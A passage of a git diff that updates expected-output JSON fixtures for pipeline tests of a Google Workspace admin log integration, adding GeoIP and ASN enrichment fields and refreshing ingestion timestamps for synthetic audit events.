"BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -4587,7 +5451,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916125600Z", + "ingested": "2021-12-14T14:44:24.297944889Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CREATE_RULE\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", "provider": "admin", "action": "CREATE_RULE", @@ -4642,6 +5506,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4651,7 +5527,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916130200Z", + "ingested": "2021-12-14T14:44:24.297945225Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_RULE_CRITERIA\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", "provider": "admin", "action": "CHANGE_RULE_CRITERIA", @@ -4706,6 +5582,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -4715,7 +5603,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916136100Z", + "ingested": "2021-12-14T14:44:24.297945621Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"DELETE_RULE\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", "provider": "admin", "action": "DELETE_RULE", @@ -4768,6 +5656,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4777,7 +5677,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916142300Z", + "ingested": "2021-12-14T14:44:24.297946067Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RENAME_RULE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "RENAME_RULE", @@ -4830,6 +5730,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -4839,7 +5751,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916146500Z", + "ingested": "2021-12-14T14:44:24.297946406Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RULE_STATUS_CHANGED\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", "provider": "admin", "action": "RULE_STATUS_CHANGED", @@ -4894,6 +5806,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4903,7 +5827,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916151300Z", + "ingested": "2021-12-14T14:44:24.297946736Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_SECONDARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", "provider": "admin", "action": "ADD_SECONDARY_DOMAIN", @@ -4958,6 +5882,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -4967,7 +5903,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916156900Z", + "ingested": "2021-12-14T14:44:24.297947066Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_SECONDARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", "provider": "admin", "action": "REMOVE_SECONDARY_DOMAIN", @@ -5022,6 +5958,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -5031,7 +5979,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916161200Z", + "ingested": "2021-12-14T14:44:24.297947576Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"SKIP_SECONDARY_DOMAIN_MX\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", "provider": "admin", "action": "SKIP_SECONDARY_DOMAIN_MX", 
@@ -5086,6 +6034,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -5095,7 +6055,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916165800Z", + "ingested": "2021-12-14T14:44:24.297947908Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_SECONDARY_DOMAIN_MX\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", "provider": "admin", "action": "VERIFY_SECONDARY_DOMAIN_MX", @@ -5150,6 +6110,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -5159,7 +6131,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916171700Z", + "ingested": "2021-12-14T14:44:24.297948259Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_SECONDARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", "provider": "admin", "action": "VERIFY_SECONDARY_DOMAIN", @@ -5214,6 +6186,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -5223,7 +6207,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916176300Z", + "ingested": "2021-12-14T14:44:24.297948596Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPDATE_DOMAIN_SECONDARY_EMAIL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "UPDATE_DOMAIN_SECONDARY_EMAIL", 
@@ -5278,6 +6262,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -5287,7 +6283,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916180500Z", + "ingested": "2021-12-14T14:44:24.297949002Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_SSO_SETTINGS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "CHANGE_SSO_SETTINGS", @@ -5338,6 +6334,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -5347,7 +6355,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916184800Z", + "ingested": "2021-12-14T14:44:24.297949343Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"GENERATE_PIN\"}}", "provider": "admin", "action": "GENERATE_PIN", 
@@ -5402,6 +6410,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -5411,7 +6431,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916189400Z", + "ingested": "2021-12-14T14:44:24.297949674Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPDATE_RULE\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", "provider": "admin", "action": "UPDATE_RULE", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-gmail.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-gmail.log-expected.json index 338470c38ea..38d28b73348 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-gmail.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-gmail.log-expected.json @@ -36,6 +36,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -45,7 +57,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:42.563962500Z", + "ingested": "2021-12-14T14:44:37.267056140Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"DROP_FROM_QUARANTINE\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"QUARANTINE_NAME\",\"value\":\"quarantine\"}]}}", "provider": "admin", "action": "DROP_FROM_QUARANTINE", @@ -102,6 +114,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -111,7 +135,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:42.563970900Z", + "ingested": "2021-12-14T14:44:37.267058511Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"EMAIL_LOG_SEARCH\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_END_DATE\",\"value\":\"2020/07/28 04:59:59 UTC\"},{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"EMAIL_LOG_SEARCH_RECIPIENT\",\"value\":\"recipient\"},{\"name\":\"EMAIL_LOG_SEARCH_SENDER\",\"value\":\"sender\"},{\"name\":\"EMAIL_LOG_SEARCH_SMTP_RECIPIENT_IP\",\"value\":\"1.1.1.1\"},{\"name\":\"EMAIL_LOG_SEARCH_SMTP_SENDER_IP\",\"value\":\"1.1.1.1\"},{\"name\":\"EMAIL_LOG_SEARCH_START_DATE\",\"value\":\"2002-10-02T10:00:00Z\"}]}}", "provider": "admin", "action": "EMAIL_LOG_SEARCH", @@ -162,6 +186,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -171,7 +207,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:42.563976300Z", + "ingested": "2021-12-14T14:44:37.267058862Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"EMAIL_UNDELETE\",\"parameters\":[{\"name\":\"END_DATE\",\"value\":\"2002-10-02T12:00:00Z\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"START_DATE\",\"value\":\"2002-10-02T10:00:00Z\"}]}}", "provider": "admin", "action": "EMAIL_UNDELETE", @@ -227,6 +263,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -236,7 +284,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:42.563981600Z", + "ingested": "2021-12-14T14:44:37.267059212Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"CHANGE_EMAIL_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_EMAIL_SETTING", 
@@ -292,6 +340,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -301,7 +361,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:42.563987Z", + "ingested": "2021-12-14T14:44:37.267059535Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"CHANGE_GMAIL_SETTING\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_DESCRIPTION\",\"value\":\"setting description\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"USER_DEFINED_SETTING_NAME\",\"value\":\"setting name\"}]}}", "provider": "admin", "action": "CHANGE_GMAIL_SETTING", @@ -357,6 +417,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -366,7 +438,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:42.563991Z", + "ingested": "2021-12-14T14:44:37.267064355Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"CREATE_GMAIL_SETTING\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_DESCRIPTION\",\"value\":\"setting description\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"USER_DEFINED_SETTING_NAME\",\"value\":\"setting name\"}]}}", "provider": "admin", "action": "CREATE_GMAIL_SETTING", @@ -422,6 +494,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -431,7 +515,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:42.563995300Z", + "ingested": "2021-12-14T14:44:37.267064788Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"DELETE_GMAIL_SETTING\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_DESCRIPTION\",\"value\":\"setting description\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"USER_DEFINED_SETTING_NAME\",\"value\":\"setting name\"}]}}", "provider": "admin", "action": "DELETE_GMAIL_SETTING", 
@@ -489,6 +573,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -498,7 +594,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:42.564000600Z", + "ingested": "2021-12-14T14:44:37.267065152Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"REJECT_FROM_QUARANTINE\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"QUARANTINE_NAME\",\"value\":\"quarantine\"}]}}", "provider": "admin", "action": "REJECT_FROM_QUARANTINE", @@ -555,6 +651,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -564,7 +672,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:42.564005200Z", + "ingested": "2021-12-14T14:44:37.267065510Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"RELEASE_FROM_QUARANTINE\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"QUARANTINE_NAME\",\"value\":\"quarantine\"}]}}", "provider": "admin", "action": "RELEASE_FROM_QUARANTINE", 
diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-groups.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-groups.log-expected.json index aac7bcf5b20..fc9d37d848b 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-groups.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-groups.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -45,8 +33,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:38:43.717685400Z", + "ingested": "2021-12-14T14:44:38.692853941Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CREATE_GROUP\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"}]}}", "provider": "admin", "action": "CREATE_GROUP", 
@@ -69,24 +78,15 @@ } } }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "group", "domain": "example.com" } }, { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "ecs": { "version": "1.12.0" @@ -119,8 +119,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:38:43.717691200Z", + "ingested": "2021-12-14T14:44:38.692860136Z", "original": 